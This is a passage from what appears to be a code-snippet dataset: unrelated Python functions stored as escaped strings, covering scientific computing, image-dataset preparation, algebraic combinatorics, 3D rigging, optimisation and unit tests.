np.where(np.all((close>0,close<=cutoff_short),axis=0))\n\t\t\tpds[tuple((nears[0],nns[nears]))] = 1.0#close[nears]\n\t\t\tpds[tuple((nns[nears],nears[0]))] = 1.0#close[nears]\n\t\tconnectivity = sklearn.neighbors.kneighbors_graph(findframe,\n\t\t\tn_neighbors=self.cluster_neighbors,include_self=False)\n\t\tward = sklearn.cluster.AgglomerativeClustering(n_clusters=2,\n\t\t\tconnectivity=connectivity,linkage='complete').fit(findframe)\n\t\timono = ward.labels_\n\t\tif np.mean(imono)==0.5: \n\t\t\tstatus('[STATUS] perfect split is %0.5f'%np.mean(imono))\n\t\telif (np.all(np.array(imono)==0) or np.all(np.array(imono)==1) or \n\t\t\tnp.abs(np.mean(imono)-0.5)>=max_count_asymmetry):\n\t\t\tstatus('[STATUS] split is %0.5f'%np.mean(imono))\n\t\t\tstatus('[STATUS] one side has %d'%np.sum(imono))\n\t\t\tstatus('[WARNING] leaflets were not distinguished')\n\t\t\traise Exception('[ERROR] failed to identify leaflets. '\n\t\t\t\t'DEVELOPMENT NOTE!? use legacy or a different cutoff?')\n\t\telse: status('[STATUS] some lipids might be flipped %d %.5f'%(np.sum(imono),np.mean(imono)))\n\t\treturn np.array(imono)", "def create_lmdb_for_div2k():\n # HR images\n folder_path = 'trainsets/DIV2K/DIV2K_train_HR_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_HR_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx2 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X2_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X2_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx3 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X3_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X3_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx4 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X4_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X4_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)", "def cut_bonds_strain(xy, NL, KL, BM0, bstrain):\n NP, NN = np.shape(NL)\n BL = NL2BL(NL, KL)\n bL0 = BM2bL(NL, BM0, BL)\n BLtrim, bL0trim = cut_bonds_strain_BL(BL, xy, bL0, bstrain)\n KL = BL2KL(BLtrim, NL)\n # i2cut = (np.sqrt((xy[BL[:,0],0]-xy[BL[:,1],0])**2+(xy[BL[:,0],1]-xy[BL[:,1],1])**2) - bL0) < bstrain*bL0\n return KL, BLtrim, bL0trim", "def test_1_2_2D_rec_splits(self):\n check = [(3.0, -2.0), (7.0, -1.0), (7.0, -2.0), (3.0, -1.0),\n (5.0, -1.5), (3.0, -1.5), (5.0, -2.0), (4.0, -1.75),\n (7.0, -1.5), (5.0, -1.0), (6.0, -1.25), (6.0, -1.75),\n (4.0, -1.25), (5.0, -1.75), (4.0, -1.5), (4.5, -1.625),\n (3.0, -1.75), (4.0, -2.0), (3.5, -1.875), (3.5, -1.625),\n (4.5, -1.875), (5.0, -1.25), (6.0, -1.5), (5.5, -1.375),\n (7.0, -1.25), (6.0, -1.0), (6.5, -1.125), (6.5, -1.375),\n (5.5, -1.125), (5.5, -1.625), (7.0, -1.75), (6.0, -2.0),\n (6.5, -1.875), (6.5, -1.625), (5.5, -1.875), (4.5, -1.375),\n (3.0, -1.25), (4.0, -1.0), (3.5, -1.125), (3.5, -1.375),\n (4.5, -1.125)]\n nn_checks = {(3.0, -2.0): [(3.0, -1.75), (3.5, -1.875), (4.0, -2.0)],\n (5.0, -1.75): [(5.0, -2.0), (5.0, -1.5), (5.5, -1.625),\n (5.5, -1.875), (4.5, -1.625), (6.0, -1.75),\n (4.5, -1.875), (4.0, -1.75)],\n (6.0, -2.0): [(5.0, -2.0), (5.5, -1.875), (6.0, -1.75),\n (6.5, -1.875), (7, -2)],\n (4.5, -1.125): [(5.0, -1.0), (4.0, -1.25), (5.0, -1.25),\n (4.0, -1.0)]}\n\n init_triangulation(2, 2, check, nn_checks, bounds=[(3, 7), (-2, -1)])", "def make_branch_matrix(self):\n self.bm = []\n for pod in self.pods:\n for lb in pod.limbs:\n row = []\n for br in lb.branches:\n row.append(br)\n self.bm.append(row)\n #print \"appended %d-element row %d\" % (len(row),len(self.bm))", "def lmbd(self, lamb):\n\t n = self.nodes\n\n\t \t# The top_k_nodes is a list of all nodes in descending\n\t # order of influence\n\t top_k_nodes = self.top_k(self.nodes)\n\t for i in range(n):\n\t\t\tself.deactivate_all()\n\t\t\tinitially_active = top_k_nodes[:i]\n\n\t\t\ttotal_contrib = i + 1\n\t\t\tfor node in initially_active:\n\t\t\t\ttotal_contrib += self.v(node)\n\n\t\t\tcoverage = total_contrib*1.00/n\n\t\t\tif coverage >= lamb:\n\t\t\t\treturn top_k_nodes[:i]", "def _G_to_km_on_basis_single_level(self, w, m):\n kB = self._sym.kBoundedSubspace(self.k,t=1)\n g = kB.K_kschur()\n mon = self.km()\n if m < w.length():\n return 0\n ans = self.zero()\n for la in Partitions(m, max_part = self.k):\n ans += g.homogeneous_basis_noncommutative_variables_zero_Hecke((la)).coefficient(w)*mon(la)\n return ans", "def bisection(leaf, args):\n #retrieve the lower/upper bound of given Most Promising Region\n lb = leaf.lb\n ub = leaf.ub\n #find the dimension number of decision variabless\n dimX = len(lb)\n #determine the dimension that should be partitioned\n dimID = (leaf.level + 1) % dimX \n #determine the partition threshold\n thr = (lb[dimID]+ub[dimID])/2.0\n #create new lower/upper middle bound [lb,umb], [lmd,ub]\n lmb,umb = [np.array([]) for i in range(2)]\n for i in range(dimX):\n lmb = np.append(lmb,[lb[i],thr][i==dimID])\n umb = np.append(umb,[ub[i],thr][i==dimID])\n subRegions = [[lb,umb],[lmb,ub]]\n return {'parent':leaf,'thr':thr,'subRegions':subRegions}", "def __init__(self, wks, bks, wqs, bqs):\r\n self.wks = wks\r\n self.bks = bks\r\n self.wqs = wqs\r\n self.bqs = bqs", "def generate_jaccard0_isoseq_bed(self):\n all = set(self.isoseqid2exonlen.keys())\n notwant = set(self.isoseqid2besttransidB.keys())\n want = all - notwant\n want_lines = []\n with open(\"../data/pacbio/\" + self.name + \".B.j0.bed\", 'w') as f:\n for line in self.linesPacBioBed:\n (chrom, chromStart, chromEnd, name, score, strand, thickStart, thickEnd, itemRgb, blockCount, blockSizes, blockStarts) = line.rstrip().split(\"\\t\")\n if name in want:\n f.write(line)", "def MakeDoubleBag(self):\n for i in self.TetrominoTypeList:\n self.bag.update({i : 2})", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def simple_maize(plant_area=10000, plant_height=200, pseudostem_height=20,\n phytomer=16, rmax=0.67, pseudostem_dist=1.4, stem_dist=1.,\n diam_base=2.5, diam_top=1, leaves=None, phyllotactic_angle=180,\n phyllotactic_deviation=15, plant_orientation=0, wl=0.1, skew=0.15, seed=None):\n\n numpy.random.seed(seed)\n ranks = range(1, phytomer + 1)\n ntop = max(ranks) - numpy.array(ranks) + 1\n if leaves is None:\n path = maize_leaves_path()\n db = load_leaf_db(path)\n leaves = {rank: db.get(str(rank), db['10'])[0] for rank in ranks}\n\n phytomer = int(phytomer)\n\n # Lejeune an Bernier formula + col =\n nb_young_phy = int(round((phytomer - 1.95) / 1.84 / 1.3))\n\n # compute the leaf surface\n leaf_area = numpy.array(\n bell_shaped_dist(plant_area=plant_area, nb_phy=phytomer, rmax=rmax,\n skew=skew))\n\n # distances between leaves\n pseudostem = geometric_dist(pseudostem_height, nb_young_phy,\n pseudostem_dist)\n stem = geometric_dist(plant_height - pseudostem_height,\n phytomer - nb_young_phy, stem_dist)\n internode = pseudostem + stem\n # stem diameters\n diameter = ([diam_base] * nb_young_phy +\n numpy.linspace(diam_base, diam_top,\n phytomer - nb_young_phy).tolist())\n\n ff = [get_form_factor(leaves[rank]) for rank in ranks]\n blades = blade_dimension(area=leaf_area, form_factor=ff, ntop=ntop, wl=wl)\n stem = stem_dimension(internode=internode, d_internode=diameter, ntop=ntop)\n df = blades.merge(stem)\n\n df['leaf_azimuth'] = leaf_azimuth(size=len(ranks), phyllotactic_angle=phyllotactic_angle, phyllotactic_deviation=phyllotactic_deviation,\n plant_orientation=plant_orientation)\n df['leaf_rank'] = ranks\n df['leaf_shape'] = [leaves[n] for n in df.leaf_rank]\n\n return df", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'F')\n\n from sage.combinat.root_system.weyl_group import WeylGroup\n self._weyl = WeylGroup(['A', kBoundedRing.k, 1])\n\n km = kBoundedRing.km()\n self.module_morphism(self._F_to_m_on_basis,codomain=km).register_as_coercion() # morphism from affine Schur functions to k-bounded-m\n km.module_morphism(self._m_to_F_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-m basis to affine-Schur basis", "def key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def make_chains(corpus):\n c_dict = {}\n\n for x in range(len(corpus)):\n if x < (len(corpus)-2): # not in edge\n bigram_tuple = tuple([corpus[x],corpus[x+1]])\n if bigram_tuple in c_dict:\n c_dict[bigram_tuple].append(corpus[x+2])\n else:\n c_dict[bigram_tuple] = [corpus[x+2]]\n else:\n bigram_tuple = tuple([corpus[-2],corpus[-1]]) # ran twice. Why?\n c_dict.setdefault(bigram_tuple) # could set a default word? Empty list?\n\n return c_dict", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'dks')\n\n kHLP = kBoundedRing.kHallLittlewoodP()\n self.module_morphism(self._dks_to_khlp_on_basis,codomain=kHLP).register_as_coercion() # morphism from dual-k-Schurs to k-bounded-HLP\n kHLP.module_morphism(self._khlp_to_dks_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-HLP to dual-k-Schurs", "def add_branch(mb, k, l):\n return _RNAstructure_wrap.add_branch(mb, k, l)", "def test_weyl_specialize_fsim_abmb(self, aaa=0.456, bbb=0.132):\n a, b, c = aaa, bbb, -bbb\n for da, db, dc in DELTAS:\n for k1l, k1r, k2l, k2r in K1K2SB:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n self.check_two_qubit_weyl_specialization(\n k1 @ Ud(a + da, b + db, c + dc) @ k2,\n 0.999,\n TwoQubitWeylfSimabmbEquiv,\n {\"rx\": 7, \"ry\": 4, \"rxx\": 1, \"ryy\": 1, \"rzz\": 1},\n )", "def test_split_outer_multipolygon_way_2():\n data = cache_query(ways=[15001, 15002], deps=True)\n assert data['ways']['15001']['relations'].keys() == ['15001']\n assert data['ways']['15002']['relations'].keys() == ['15001']\n\n assert query_row(db_conf, 'osm_landusages', 15001) == None\n park_15001 = query_row(db_conf, 'osm_landusages', -15001)\n assert park_15001['type'] == 'park'\n assert_almost_equal(park_15001['geometry'].area, 9816216452, -1)\n assert query_row(db_conf, 'osm_roads', 15002)['type'] == 'residential'", "def __init__(self):\n self.kids = [{}]\n self.root = 0\n self.vocabular = set([])", "def gen_Strikes(L):\r\n p = next_Prim(L)\r\n t = 1\r\n yield t*p\r\n for k in L:\r\n t += k\r\n yield t*p", "def __bcc_left_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def split_at_conflict(scaff1, scaff2, k):\n linker = \"link_conflict5\"\n p1 = scaff1.index(k)\n p2 = scaff2.index(k)\n \n l_split1=0\n r_split1=0\n l_split2=0\n r_split2=0\n out1=[]\n out2=[]\n out3=[]\n out_scaffs = []\n\n for q in range(len(scaff2)-p2-1):\n if scaff1[p1+q] != scaff2[p2+q]:\n r_split1 = p1+q-1\n r_split2 = p2+q-1\n break\n for q in range(p2):\n if scaff1[p1-q] != scaff2[p2-q]:\n l_split1 = p1-q+2\n l_split2 = p2-q+2\n break\n\n if l_split1 and r_split1: \n out1 = scaff1[:l_split1]\n out1.append(linker)\n out2 = scaff1[l_split1:r_split1]\n out2.insert(0,linker)\n out2.append(linker)\n out3 = scaff1[r_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out2,out3])\n \n elif l_split1:\n out1 = scaff1[:l_split1]\n out1.append(linker)\n out3 = scaff1[l_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out3]) \n \n elif r_split1:\n out1 = scaff1[:r_split1]\n out1.append(linker)\n out3 = scaff1[r_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out3])\n \n else:\n paf(\"NB! Expected conflict not found\")\n\n if l_split2 and r_split2:\n out1 = scaff2[:l_split2]\n out1.append(linker)\n out2 = scaff2[l_split2:r_split2]\n out2.insert(0,linker)\n out2.append(linker)\n out3 = scaff2[r_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out2,out3])\n \n elif l_split2:\n out2 = scaff2[:l_split2]\n out2.append(linker)\n out3 = scaff2[l_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out2,out3])\n \n elif r_split2:\n out2 = scaff2[:r_split2]\n out2.append(linker)\n out3 = scaff2[r_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out2,out3])\n \n else:\n paf(\"NB! Expected conflict not found\")\n\n return out_scaffs", "def cutNow(self,leftMonomers,definitive=False):\n # A1 ~ Unif[0,N-1-(Nc-1)(g-1)[\n for A1 in leftMonomers:\n A2 = A1 + 1\n # Mise a jour de la matrice laplacienne\n self.LaplacianMatrix[A1,A2] = 0\n self.LaplacianMatrix[A2,A1] = 0\n self.LaplacianMatrix[A1,A1] -= 1 \n self.LaplacianMatrix[A2,A2] -= 1 \n # Mise a jour de la liste d'adjacence\n self.cutEdge(A1,A2)\n # Add new free ends to freeMonomers list\n self.freeMonomers.extend([A1,A2])\n \n if definitive:\n self.generatePossibleEncounters()\n# \n for i in range(len(self.freeMonomers)):\n self.freeMonomersNames[self.freeMonomers[i]] = chr(97 + i//2) + str(1 + i%2)", "def _khlp_to_dks_on_basis(self, la):\n Sym = self._kBoundedRing.ambient()\n kB = Sym.kBoundedSubspace(self.k, t=self.t)\n Qp = Sym.hall_littlewood(t=self.t).Qp()\n ks = kB.kschur()\n return sum( Qp(ks(x)).coefficient(la) * self(x) for x in PartitionsGreatestLE(sum(la), self.k))", "def __init__(self, k):\n self.k = k\n self.N = 2**self.k", "def khorne_slide(obs, berzerker_x, berzerker_y):\n def environment_fits(obs, berzerker_x, berzerker_y):\n \"\"\" environment fits constraints \"\"\"\n # if prey has the ball\n if obs[\"ball_owned_team\"] == 1:\n prey_x = obs[\"right_team\"][obs[\"ball_owned_player\"]][0]\n prey_y = obs[\"right_team\"][obs[\"ball_owned_player\"]][1]\n # by x position, amount of berzerker's team players between prey and goal of berzerker's team\n players_amount = 0\n for i in range(1, len(obs[\"left_team\"])):\n if obs[\"left_team\"][i][0] < prey_x:\n players_amount += 1\n prey_x_direction = obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][0]\n future_prey_x = prey_x + obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][0]\n future_prey_y = prey_y + obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][1]\n future_berzerker_x = berzerker_x + obs[\"left_team_direction\"][obs[\"active\"]][0]\n future_berzerker_y = berzerker_y + obs[\"left_team_direction\"][obs[\"active\"]][1]\n distance_to_prey = get_distance(berzerker_x, berzerker_y, prey_x, prey_y)\n future_distance_to_prey = get_distance(future_berzerker_x, future_berzerker_y, future_prey_x, future_prey_y)\n # if berzerker is not close to his own penalty zone\n # and prey is beyond x position of too many players of berzerker's team\n # and berzerker is close enough to prey\n # and berzerker is running in direction of prey\n if ((berzerker_x > -0.65 or abs(berzerker_y) > 0.3) and\n players_amount <= 7 and\n future_distance_to_prey < 0.015 and\n distance_to_prey > future_distance_to_prey):\n return True\n return False\n \n def get_action(obs, berzerker_x, berzerker_y):\n \"\"\" get action of this memory pattern \"\"\"\n return Action.Slide\n \n return {\"environment_fits\": environment_fits, \"get_action\": get_action}", "def breed(self):\r\n self.offspring = []\r\n # 0 will increment each time a node breeds, until it reaches breeding_times\r\n available = [[x, 0] for x in self.population] # who is left available\r\n while True:\r\n # take the first node in available as the base, breed them with random partners\r\n # in available, then remove first node from available\r\n\r\n # range(...) ensures we breed the right number of times\r\n for breed_count in range(available[0][1], self.breeding_times):\r\n try: # try to choose a partner from those in available\r\n choice = random.choice(available[1:])\r\n except IndexError: #Sometimes the last guy gets left out\r\n #print('ruh roh')\r\n choice = [random.choice(self.population), -1]\r\n\r\n # breed with the chosen partner\r\n self.offspring.append(available[0][0].reproduce(choice[0]))\r\n # increase the partner's breed count by one\r\n choice[1] += 1\r\n # if the partner's bred the requisite number of times, remove them from available\r\n if choice[1] == self.breeding_times:\r\n available.remove(choice)\r\n # remove our start node from available\r\n del(available[0])\r\n\r\n # if everyone's bred, break the loop\r\n if len(available) == 0:\r\n break\r\n\r\n # archive the parent generation, make the new population the offspring.\r\n self.past_generations.append(self.population)\r\n self.population = self.offspring", "def homology_basis(bd, k, C=None, shortest=False, log=None):\n L1, R1, S1, L1inv = smith_normal_form_mod2(bd[k])\n L2, R2, S2, L2inv = smith_normal_form_mod2(bd[k + 1])\n\n rank1 = np.sum(S1)\n rank2 = np.sum(S2)\n nullity1 = S1.shape[1] - rank1\n betti1 = S1.shape[1] - rank1 - rank2\n cokernel2_dim = S1.shape[1] - rank2\n\n print(f'Summary: \\nrank{k} = {rank1}\\nrank{k+1} = {rank2}\\nnullity{k} = {nullity1}')\n\n ker1 = R1[:, rank1:]\n im2 = L2inv[:, :rank2]\n cokernel2 = L2inv[:, rank2:]\n cokproj2 = L2[rank2:, :]\n\n proj = matmulreduce([cokernel2, cokproj2, ker1]).transpose()\n ######\n print(proj)\n _, proj, _ = reduced_row_echelon_form_mod2(proj)\n proj = np.array(proj)\n proj = np.array([row for row in proj if np.any(row)])\n # print(f'hom basis reps: {proj*1}\\n')\n basis = []\n if shortest:\n shortest_basis = list()\n for idx, bs in enumerate(proj):\n shortest_basis.append(coset(im2, bs=bs, shortest=True))\n if C:\n basis = [interpret(C, sb) for sb in shortest_basis]\n\n proj = shortest_basis\n else:\n if C:\n basis = interpret(C, proj)\n else:\n basis = proj\n if log:\n try:\n logdict = pickle.load(open(log, 'rb'))\n except:\n logdict = dict()\n logdict.update({'k': k,\n f'betti{k}': betti1,\n 'ker': ker1,\n 'im': im2,\n 'proj': proj,\n 'basis': basis})\n pickle.dump(logdict, open(log, 'wb'))\n\n return basis", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def cuttingStockKantorovich(w, q, B):\n\n model = Model(\"Naive Cutting Stock\")\n m = max(w)*max(q) # m rolls\n n = len(q) # n orders \n y = {}\n for j in range(m):\n y[j] = model.addVar(name = \"y[%s]\" % j, vtype=\"BINARY\")\n \n x = {}\n for j in range(m):\n for i in range(n):\n x[i,j] = model.addVar(name = \"x[%s,%s]\" %(i,j), lb = 0, vtype=\"INTEGER\")\n model.addCons(x[i,j] <= q[i]*y[j])\n\n for i in range(n):\n model.addCons(quicksum(x[i,j] for j in range(m)) == q[i])\n\n for j in range(m):\n model.addCons((quicksum(w[i]*x[i,j] for i in range(n)) <= B))\n\n model.setObjective(quicksum(y[j] for j in range(m)), \"minimize\")\n model.hideOutput()\n model.optimize()\n\n return model.getObjVal()", "def test_family_reservation_max_amount_of_childs(self):\n start_date = datetime.now()\n\n reservation_list = [\n BikeReservationPerHour(start_date) \n ,BikeReservationPerDay(start_date)\n ,BikeReservationPerDay(start_date)\n ,BikeReservationPerWeek(start_date)\n ,BikeReservationPerWeek(start_date)\n ,BikeReservationPerWeek(start_date)\n ]\n\n with self.assertRaises(InvalidAmountOfBikeReservationsOnFamiliyError):\n family_reservation = FamilyBikeReservation(reservation_list)", "def 